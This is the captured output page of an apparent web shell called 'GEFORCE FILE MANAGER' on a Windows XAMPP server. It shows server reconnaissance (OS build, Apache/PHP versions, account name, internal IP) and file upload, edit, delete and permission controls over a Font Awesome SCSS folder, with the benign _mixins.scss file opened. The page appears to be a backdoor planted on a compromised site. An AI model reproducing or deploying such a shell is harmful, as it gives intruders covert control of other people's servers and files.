[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
media
/
vendor
/
fontawesome-free
/
scss
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 _animated.scss
300 B
SET
[ EDIT ]
|
[ DEL ]
📄 _fixed-width.scss
121 B
SET
[ EDIT ]
|
[ DEL ]
📄 _icons.scss
118,034 B
SET
[ EDIT ]
|
[ DEL ]
📄 _larger.scss
398 B
SET
[ EDIT ]
|
[ DEL ]
📄 _list.scss
323 B
SET
[ EDIT ]
|
[ DEL ]
📄 _mixins.scss
1,266 B
SET
[ EDIT ]
|
[ DEL ]
📄 _rotated-flipped.scss
833 B
SET
[ EDIT ]
|
[ DEL ]
📄 _shims.scss
65,388 B
SET
[ EDIT ]
|
[ DEL ]
📄 _stacked.scss
505 B
SET
[ EDIT ]
|
[ DEL ]
📄 _variables.scss
39,132 B
SET
[ EDIT ]
|
[ DEL ]
📄 brands.scss
803 B
SET
[ EDIT ]
|
[ DEL ]
📄 fontawesome.scss
433 B
SET
[ EDIT ]
|
[ DEL ]
📄 regular.scss
805 B
SET
[ EDIT ]
|
[ DEL ]
📄 v4-shims.scss
224 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: _mixins.scss
// Mixins // -------------------------- @mixin fa-icon { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; display: inline-block; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1; } @mixin fa-icon-rotate($degrees, $rotation) { -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation})"; transform: rotate($degrees); } @mixin fa-icon-flip($horiz, $vert, $rotation) { -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation}, mirror=1)"; transform: scale($horiz, $vert); } // Only display content to screen readers. A la Bootstrap 4. // // See: http://a11yproject.com/posts/how-to-hide-content/ @mixin sr-only { border: 0; clip: rect(0, 0, 0, 0); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; } // Use in conjunction with .sr-only to only display content when it's focused. // // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 // // Credit: HTML5 Boilerplate @mixin sr-only-focusable { &:active, &:focus { clip: auto; height: auto; margin: 0; overflow: visible; position: static; width: auto; } }